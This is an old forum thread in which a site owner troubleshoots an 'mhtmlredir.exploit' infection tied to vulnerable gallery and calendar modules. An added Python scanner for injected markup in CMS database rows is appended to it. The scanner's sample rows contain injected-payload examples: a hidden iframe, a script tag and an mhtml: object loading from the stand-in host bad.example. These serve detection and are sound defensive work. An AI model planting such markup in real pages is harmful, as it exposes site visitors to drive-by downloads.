dean
Worker
Joined: Apr 14, 2004
Posts: 193
Posted: Fri Nov 19, 2004 1:49 am

I don't know how, but someone got past my sentinel and patches to install the mhtmlredir.exploit virus, and many peeps can't see the site, and those that do are exposed to the virus. It's so bad I can't even log into FTP or cPanel. The host is supposedly sanitizing the site, but I hope I can figure out how it all happened to begin with...
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
Posted: Fri Nov 19, 2004 2:34 am

Do you use Coppermine or any other application that allows uploads?
dean
Posted: Fri Nov 19, 2004 3:14 am

Yes, latest version of Coppermine, enhanced downloads module and Z advertising.
Raven
Posted: Fri Nov 19, 2004 7:04 am

My guess is that's your culprit, but your host needs to do an audit to see for sure.
jaded
Theme Guru
Joined: Nov 01, 2003
Posts: 1006
Posted: Fri Nov 19, 2004 8:02 am

I agree with Raven. I have banned the use of Coppermine and/or My_Egallery on our server. The holes are enormous. We had a client whose site was turned into an eggdropper because of My_Egallery. I would strongly suggest a different gallery. I am currently very pleased with the one I use on my site. You may view it via my site in my signature. Please be certain to remove all instances of the Coppermine. That includes from your admin files.

_________________
Themes BB Skins: http://www.jaded-designs.com
Graphic Tees: http://www.cafepress.com/jadeddesigns
Paranormal Tees: http://www.cafepress.com/HauntedTees
Ghost Stories & More: http://www.hauntingtales.net
dean
Posted: Sat Nov 20, 2004 4:48 am

I am stuck. My browser no longer allows me to view any of the five sites I have installed at the alaskandog.com domain. All I get is the basic "site cannot be found" error, and when I click on Properties the actual URL is:
res://C:\WINDOWS\system32\shdoclc.dll/dnserror.htm#http://alaskandog.com
I've run Norton AntiVirus, Spybot, Ad-Aware and ad-ware programs to try and detect the problem, to no avail. A search of Google isn't helping... does anyone have some experience here? I am told the virus on my site is called the mhtmlredir.exploit.
hitwalker
Sells PC To Pay For Divorce
Posts: 5661
Posted: Sat Nov 20, 2004 5:03 am

That's strange?...
No Google results?
And what about this: http://securityresponse.symantec.com/avcenter/venc/data/mhtmlredir.exploit.html
Says clearly: "This threat allows a malicious Web site to download and execute programs on your computer".
Or this one...

Question
Just got a message from Norton that it found this virus but could not fix as access was denied. MHTMLRedir.Exploit. Should I be concerned by this?

Answer
Howdy:
Because this is an exploit only, there are no removal instructions, since there is nothing to remove. This is a detection for the exploit, preventing the execution of malicious content on your computer. By detecting the exploit, it is prevented from running.

And even with my busy life I give you another one...

Question
My computer has got the above and my anti-virus does nothing because it states it is an 'exploit' not a virus. I cannot change my IE homepage because it automatically defaults to the default setting, this is a straightforward search engine (http://searchpage.cc), neither can I download anything because it goes straight back to the homepage. I am on broadband using Windows XP, with Windows Internet Explorer, and I'm starting to despair; if possible please help.

Answer
You have been infected with adware or spyware. Your antivirus won't remove it purely for legal reasons. Here is how those things often infect your computer. When you install some kinds of free software, or download things from some web sites, and click on the user license, in the teeny tiny and confusingly worded fine print, you end up agreeing to these nasty things.
For instant free help, try Ad-aware, http://lavasoft.element5.com/software/adaware, and Spybot, http://www.safer-networking.org. You can use one or both together, they are compatible.

So the question now is, who's infected?
I can see your maintenance page...
jaded
Posted: Sat Nov 20, 2004 9:54 am

Dean,
It sounds to me like you may be server banned. I see the "page not displayed" when my server bans me from time to time. My suggestion is for you to attempt to go to several sites that are also on the same hosting server. If you do not know what they are, then I would contact your host for the information. It is best to find this out before you spend a lot of time looking for another answer. This will just let you rule out one thing. Of course, if you can change your IP I would suggest that first. Be certain to look at your IP number before you attempt to change it. Then change it and look at it again. Sometimes a reboot won't change your IP. Double check!
dean
Posted: Sat Nov 20, 2004 11:12 pm

Yeah Jaded, it turned out I was server banned; the host rectified it earlier today. This after running three different virus detectors, Ad-Aware, ad-ware... Once I was able to get in, I figured it was a MySQL injection, because when I ran a virus detector over the database tables, it detected and removed the item. Unfortunately, the remaining tables didn't work very well and I didn't want to mess any more with it, so I restored a backup from the previous week.
Now the maddening problem is that my users come to this site primarily for the calendar and gallery, both of which are vulnerable. If I get rid of either, the site will suffer. Changing to another gallery or calendar module will likely result in much keyboarding. Argh... I'm sure the regular users are getting fed up with the disruptions by now...
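Dean's last post says the injected item was found in the database tables, and the Symantec text hitwalker quotes says what the exploit does to visitors who load a page carrying it. The following is an added example for this thread, not code from PHP-Nuke, Coppermine or any poster: a defender-side scan over rows exported from a CMS database that flags markup pulling content from an off-site host (script, iframe, object, embed) or using the mhtml:/ms-its: URL schemes that the MHTMLRedir.Exploit detection name refers to. The sample rows, the bad.example host and the `scan_rows` / `InjectionFinder` names are constructed assumptions; alaskandog.com is the domain Dean names, and the indicator patterns are assumptions about what such an injection looks like, since the thread never shows the payload.

```python
"""Scan stored page content for injected markup that sends visitors elsewhere.
Added example, not code from the thread, PHP-Nuke or Coppermine.
The sample rows and indicator patterns below are constructed assumptions."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed indicators: URL schemes tied to the exploit the thread names.
SUSPECT_SCHEMES = ("mhtml", "ms-its")
# Tags whose src/data attribute loads remote content into the visitor's browser.
LOADER_TAGS = {"script": "src", "iframe": "src", "object": "data", "embed": "src"}


def _is_hidden(attrs):
    """True if the element is sized to zero or styled invisible."""
    style = re.sub(r"\s+", "", (attrs.get("style") or "").lower())
    width = (attrs.get("width") or "").strip().rstrip("px")
    height = (attrs.get("height") or "").strip().rstrip("px")
    return (width == "0" or height == "0"
            or "display:none" in style or "visibility:hidden" in style)


class InjectionFinder(HTMLParser):
    """Collects (tag, url, reason) for every suspicious element in one document."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): v for k, v in attrs}
        # An mhtml:/ms-its: URL is suspicious in any attribute of any tag.
        for value in attrs.values():
            if value and urlparse(value.strip()).scheme.lower() in SUSPECT_SCHEMES:
                self.findings.append((tag, value.strip(), "mhtml/ms-its URL scheme"))
                return
        attr = LOADER_TAGS.get(tag)
        if not attr or not attrs.get(attr):
            return
        url = attrs[attr].strip()
        host = (urlparse(url).hostname or "").lower()
        # Relative URLs have no host and are treated as the site's own content.
        if host and host != self.site_host and not host.endswith("." + self.site_host):
            reason = "off-site %s" % tag
            if tag == "iframe" and _is_hidden(attrs):
                reason += ", hidden"
            self.findings.append((tag, url, reason))


def scan_rows(rows, site_host):
    """rows: iterable of (row_id, html_text), e.g. exported from a CMS table.
    Returns a list of (row_id, tag, url, reason) for every suspicious element."""
    report = []
    for row_id, html in rows:
        finder = InjectionFinder(site_host)
        finder.feed(html)
        finder.close()
        report.extend((row_id,) + finding for finding in finder.findings)
    return report


# Constructed sample rows: 1 and 5 are legitimate, 2 to 4 carry injected markup.
SAMPLE_ROWS = [
    (1, '<p>Show results</p><img src="/images/show.jpg">'
        '<a href="http://securityresponse.symantec.com/">advisory</a>'),
    (2, '<p>Calendar</p><iframe src="http://bad.example/r.htm" width="0" height="0"></iframe>'),
    (3, '<script src="http://bad.example/x.js"></script><p>Gallery</p>'),
    (4, '<object data="mhtml:http://bad.example/a.mht!file.htm"></object>'),
    (5, '<script src="http://www.alaskandog.com/includes/cal.js"></script>'),
]

if __name__ == "__main__":
    for row_id, tag, url, reason in scan_rows(SAMPLE_ROWS, "alaskandog.com"):
        print("row %d: <%s> %s -> %s" % (row_id, tag, url, reason))
```

Run it over an export of every table that holds rendered HTML (stories, blocks, calendar and gallery descriptions) as well as over the site's static pages, and run it again after restoring from backup: a backup taken after the injection carries the same rows, so the restore Dean describes is only clean if the injected content predates it.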